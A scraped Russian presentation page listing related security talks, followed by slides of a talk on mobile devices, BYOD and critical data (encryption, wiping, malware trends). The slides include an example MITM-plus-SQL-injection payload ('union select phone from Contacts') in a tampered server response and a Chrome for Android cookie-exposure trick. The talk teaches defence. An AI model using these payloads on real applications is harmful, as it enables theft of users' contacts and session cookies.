Fraud-мониторинг для ДБО. Повышение эффективности и противостояние угрозам ба...SelectedPresentations
VII Уральский форум
Информационная безопасность банков
ТЕМАТИЧЕСКОЕ ЗАСЕДАНИЕ № 1
Банковский фрод
Левин Алексей Владимирович, ведущий специалист департамента информационной безопасности компании «БИФИТ»
Источник: http://ural.ib-bank.ru/materials_2015
Демонстрация комплексной системы контроля проводного и беспроводного доступа ...SelectedPresentations
VII Уральский форум
Информационная безопасность банков
День Практической Безопасности
Илья Митричев, руководитель направления по работе с ключевыми клиентами, компания CTI
Источник: http://ural.ib-bank.ru/materials_2015
Электронная аутентификация в государственных системахMikhail Vanin
Доклад с моего выступления на PKI Forum.
В докладе рассмотрены опыт США и Европы по электронной идентификации пользователей государственных систем. Оценены возможные подходы, применяемые в России.
Fraud-мониторинг для ДБО. Повышение эффективности и противостояние угрозам ба...SelectedPresentations
VII Уральский форум
Информационная безопасность банков
ТЕМАТИЧЕСКОЕ ЗАСЕДАНИЕ № 1
Банковский фрод
Левин Алексей Владимирович, ведущий специалист департамента информационной безопасности компании «БИФИТ»
Источник: http://ural.ib-bank.ru/materials_2015
Демонстрация комплексной системы контроля проводного и беспроводного доступа ...SelectedPresentations
VII Уральский форум
Информационная безопасность банков
День Практической Безопасности
Илья Митричев, руководитель направления по работе с ключевыми клиентами, компания CTI
Источник: http://ural.ib-bank.ru/materials_2015
Электронная аутентификация в государственных системахMikhail Vanin
Доклад с моего выступления на PKI Forum.
В докладе рассмотрены опыт США и Европы по электронной идентификации пользователей государственных систем. Оценены возможные подходы, применяемые в России.
Презентация описывает основные киберриски для бизнеса, их источники и категории потерь, а также даёт действенные и понятные рекомендации для повышения уровня кибербезопасности как личной, так и корпоративной от практиков-консультантов по кибербезопасности консалтинговой компании 10Guards (10guards.com)
В данной сессии мы подробно рассмотрим архитектурные принципы построения защищённого корпоративного периметра, с разбором решения некоторых частных задач, характерных для периметра: контроль доступа пользователей в сеть Интернет, борьба с целенаправленными (APT) угрозами, защита web и email-трафика, средства объективного контроля сетевых процессов.
Возможно SOC уже есть или SOC - мечта, однако существуют причины по которым вы его сделали или сделаете. У каждого человека - они разные. Лучше рассмотреть все варианты и выбрать свой путь.
Услуги и решения Softline в области информационной безопасности. Прикладные и инфраструктурные решения. Соответствие требованиям (compliance). Сетевая безопасность. Аудит информационной безопасности.
ИТ-системы банков являются постоянным объектом для направленных кибератак. Особенно опасными являются скрытые угрозы, которым все чаще удается преодолевать традиционные методы защиты и оставаться невидимыми внутри сети на протяжении длительного периода времени. Компаниям необходимы инструменты для осуществления мониторинга и контроля политик безопасности внутри сети, которая в большинстве случаев намного меньше защищена, чем внешний периметр. Архитектура Cisco Cyber Threat Defense обеспечивает высокий уровень определения и блокирования сложных угроз и обеспечивает динамический контроль доступа к сети с учетом бизнес-ролей пользователей.
Система управления учетными записями (IDM). Информационная безопасность. Softline
Информационная безопасность. Система управления учетными записями.
IDM – ЕДИНЫЙ ЦЕНТР КОМПЕТЕНЦИЙ В ЧАСТИ
ПРЕДОСТАВЛЕНИЯ ДОСТУПА К РЕСУРСАМ
И СИСТЕМАМ.
Обзор новой версии MDM системы от McAfee.
Архитектура, принцип работы, возможности.
http://bakotech.ua/news/mcafee-vipustila-novuyu-versiyu-mdm-sistemi/
Какие вопросы чаще всего задают вендору при выборе решения по информационной ...Denis Batrankov, CISSP
Все маркетинговые презентации почти одинаковы и после того вы прослушали маркетинг, у вас должны быть уточняющие вопросы. Какие вопросы задают мне заказчики? А вот они.
Инструмент ChangelogBuilder для автоматической подготовки Release NotesPositive Hack Days
1. Основные понятия и определения: продукт, пакет, связи между ними.
2. Как узнать, какие изменения произошли в продукте?
3. Проблемы changelog и release note.
4. Решение: инструмент ChangelogBuilder для автоматической подготовки Release Notes
Как мы собираем проекты в выделенном окружении в Windows DockerPositive Hack Days
1. Обзор Windows Docker (кратко)
2. Как мы построили систему билда приложений в Docker (Visual Studio\Mongo\Posgresql\etc)
3. Примеры Dockerfile (выложенные на github)
4. Отличия процессов DockerWindows от DockerLinux (Долгий билд, баги, remote-регистр.)
More Related Content
Similar to Мобильные устройства + BYOD + Критичные данные = ?
Презентация описывает основные киберриски для бизнеса, их источники и категории потерь, а также даёт действенные и понятные рекомендации для повышения уровня кибербезопасности как личной, так и корпоративной от практиков-консультантов по кибербезопасности консалтинговой компании 10Guards (10guards.com)
В данной сессии мы подробно рассмотрим архитектурные принципы построения защищённого корпоративного периметра, с разбором решения некоторых частных задач, характерных для периметра: контроль доступа пользователей в сеть Интернет, борьба с целенаправленными (APT) угрозами, защита web и email-трафика, средства объективного контроля сетевых процессов.
Возможно SOC уже есть или SOC - мечта, однако существуют причины по которым вы его сделали или сделаете. У каждого человека - они разные. Лучше рассмотреть все варианты и выбрать свой путь.
Услуги и решения Softline в области информационной безопасности. Прикладные и инфраструктурные решения. Соответствие требованиям (compliance). Сетевая безопасность. Аудит информационной безопасности.
ИТ-системы банков являются постоянным объектом для направленных кибератак. Особенно опасными являются скрытые угрозы, которым все чаще удается преодолевать традиционные методы защиты и оставаться невидимыми внутри сети на протяжении длительного периода времени. Компаниям необходимы инструменты для осуществления мониторинга и контроля политик безопасности внутри сети, которая в большинстве случаев намного меньше защищена, чем внешний периметр. Архитектура Cisco Cyber Threat Defense обеспечивает высокий уровень определения и блокирования сложных угроз и обеспечивает динамический контроль доступа к сети с учетом бизнес-ролей пользователей.
Система управления учетными записями (IDM). Информационная безопасность. Softline
Информационная безопасность. Система управления учетными записями.
IDM – ЕДИНЫЙ ЦЕНТР КОМПЕТЕНЦИЙ В ЧАСТИ
ПРЕДОСТАВЛЕНИЯ ДОСТУПА К РЕСУРСАМ
И СИСТЕМАМ.
Обзор новой версии MDM системы от McAfee.
Архитектура, принцип работы, возможности.
http://bakotech.ua/news/mcafee-vipustila-novuyu-versiyu-mdm-sistemi/
Какие вопросы чаще всего задают вендору при выборе решения по информационной ...Denis Batrankov, CISSP
Все маркетинговые презентации почти одинаковы и после того вы прослушали маркетинг, у вас должны быть уточняющие вопросы. Какие вопросы задают мне заказчики? А вот они.
Similar to Мобильные устройства + BYOD + Критичные данные = ? (20)
Инструмент ChangelogBuilder для автоматической подготовки Release NotesPositive Hack Days
1. Основные понятия и определения: продукт, пакет, связи между ними.
2. Как узнать, какие изменения произошли в продукте?
3. Проблемы changelog и release note.
4. Решение: инструмент ChangelogBuilder для автоматической подготовки Release Notes
Как мы собираем проекты в выделенном окружении в Windows DockerPositive Hack Days
1. Обзор Windows Docker (кратко)
2. Как мы построили систему билда приложений в Docker (Visual Studio\Mongo\Posgresql\etc)
3. Примеры Dockerfile (выложенные на github)
4. Отличия процессов DockerWindows от DockerLinux (Долгий билд, баги, remote-регистр.)
Типовая сборка и деплой продуктов в Positive TechnologiesPositive Hack Days
1. Проблемы в построении CI процессов в компании
2. Структура типовой сборки
3. Пример реализации типовой сборки
4. Плюсы и минусы от использования типовой сборки
1. Что такое BI. Зачем он нужен.
2. Что такое Qlik View / Sense
3. Способ интеграции. Как это работает.
4. Метрики, KPI, планирование ресурсов команд, ретроспектива релиза продукта, тренды.
5. Подключение внешних источников данных (Excel, БД СКУД, переговорные комнаты).
Approof — статический анализатор кода для проверки веб-приложений на наличие уязвимых компонентов. В своей работе анализатор основывается на правилах, хранящих сигнатуры искомых компонентов. В докладе рассматривается базовая структура правила для Approof и процесс автоматизации его создания.
Задумывались ли вы когда-нибудь о том, как устроены современные механизмы защиты приложений? Какая теория стоит за реализацией WAF и SAST? Каковы пределы их возможностей? Насколько их можно подвинуть за счет более широкого взгляда на проблематику безопасности приложений?
На мастер-классе будут рассмотрены основные методы и алгоритмы двух основополагающих технологий защиты приложений — межсетевого экранирования уровня приложения и статического анализа кода. На примерах конкретных инструментов с открытым исходным кодом, разработанных специально для этого мастер-класса, будут рассмотрены проблемы, возникающие на пути у разработчиков средств защиты приложений, и возможные пути их решения, а также даны ответы на все упомянутые вопросы.
От экспериментального программирования к промышленному: путь длиной в 10 летPositive Hack Days
Разработка наукоемкого программного обеспечения отличается тем, что нет ни четкой постановки задачи, ни понимания, что получится в результате. Однако даже этом надо программировать то, что надо, и как надо. Докладчик расскажет о том, как ее команда успешно разработала и вывела в промышленную эксплуатацию несколько наукоемких продуктов, пройдя непростой путь от эксперимента, результатом которого был прототип, до промышленных версий, которые успешно продаются как на российском, так и на зарубежном рынках. Этот путь был насыщен сложностями и качественными управленческими решениями, которыми поделится докладчик
Уязвимое Android-приложение: N проверенных способов наступить на граблиPositive Hack Days
Немногие разработчики закладывают безопасность в архитектуру приложения на этапе проектирования. Часто для этого нет ни денег, ни времени. Еще меньше — понимания моделей нарушителя и моделей угроз. Защита приложения выходит на передний план, когда уязвимости начинают стоить денег. К этому времени приложение уже работает и внесение существенных изменений в код становится нелегкой задачей.
К счастью, разработчики тоже люди, и в коде разных приложений можно встретить однотипные недостатки. В докладе речь пойдет об опасных ошибках, которые чаще всего допускают разработчики Android-приложений. Затрагиваются особенности ОС Android, приводятся примеры реальных приложений и уязвимостей в них, описываются способы устранения.
Разработка любого софта так или иначе базируется на требованиях. Полный перечень составляют бизнес-цели приложения, различные ограничения и ожидания по качеству (их еще называют NFR). Требования к безопасности ПО относятся к последнему пункту. В ходе доклада будут рассматриваться появление этих требований, управление ими и выбор наиболее важных.
Отдельно будут освещены принципы построения архитектуры приложения, при наличии таких требований и без, и продемонстрировано, как современные (и хорошо известные) подходы к проектированию приложения помогают лучше строить архитектуру приложения для минимизации ландшафта угроз.
Доклад посвящен разработке корректного программного обеспечения с применением одного из видов статического анализа кода. Будут освещены вопросы применения подобных методов, их слабые стороны и ограничения, а также рассмотрены результаты, которые они могут дать. На конкретных примерах будет продемонстрировано, как выглядят разработка спецификаций для кода на языке Си и доказательство соответствия кода спецификациям.
6. Шифрование
Android
• Full Disk Encryption с версии 3.0
• Нет стандартного API для шифрования данных
iOS
• Full Disk Encryption, начиная с iPhone 3GS
• Аппаратное шифрование
• Стандартное API для сторонних приложений
7. Удаление данных
Android
• Outlook
• Сторонние приложения (Антивирусы и т.п.)
• Программный вайп
iOS
• Outlook
• Mobile Device Management (MDM)
• Железный вайп
9. Malware
Общее количество экземпляров мобильного вредоносного ПО
http://www.mcafee.com/us/resources/reports/rp-quarterly-threat-q2-2012.pdf
10. Malware
Что дальше?
• рост числа троянов для мобильных платформ
• эксплойты, локальные и удаленные
• две основные цели: fraud и конфиденциальные данные
• максимальная скрытность в системе
• минимальные подозрения у пользователя
11. Уязвимости приложений
Небезопасное хранение данных
Небезопасная передача данных
MiTM атаки
Специфичные для мобильных платформ уязвимости
12. MITM+SQLI
POST https://server.com/ HTTP/1.1
action=login&
login=test_user&
password=S0mEs3cur3_pass
13. MITM+SQLI
200 OK
<xml>
<token>blablablabla</token>
<userid>1234</userid>
</xml>
14. MITM+SQLI
200 OK
<xml>
<token>blablablabla</token>
<userid>1234</userid>
</xml>
SELECT lastUpdate FROM profile WHERE userID=‘1234’;
15. MITM+SQLI
POST https://server.com/ HTTP/1.1
lastupdate=1345914732
16. MITM+SQLI
POST https://server.com/ HTTP/1.1
action=login&
login=test_user&
password=S0mEs3cur3_pass
17. MITM+SQLI
200 OK
<xml>
<token>blablablabla</token>
<userid> 1234’ and 1=0 union select phone from Contacts--
</userid>
</xml>
18. MITM+SQLI
<userid> 1234’ and 1=0 union select phone from Contacts--
</userid>
SELECT lastUpdate FROM profile WHERE userID=‘1234’
AND 1=0 UNION SELECT phone FROM Сontacts– ‘;
19. MITM+SQLI
POST https://server.com/ HTTP/1.1
lastupdate=+71234567890
20. Chrome for Android
http://, https://, file://
Cookies и История браузера в SQLITE БД
Автоматическая загрузка бинарных файлов
Файлы браузера не доступны стороннему ПО
file:///data/data/com.android.chrome/databases/Cookies
Файл Cookies будет скопирован в папку /sdcard/ и
доступен на чтением всем.
21. Выводы
Сложный пароль для PIN-to-unlock
Полное шифрование системы
Антивирусы и механизмы удаления данных
Устанавливать только доверенное ПО
BYOD – плохо!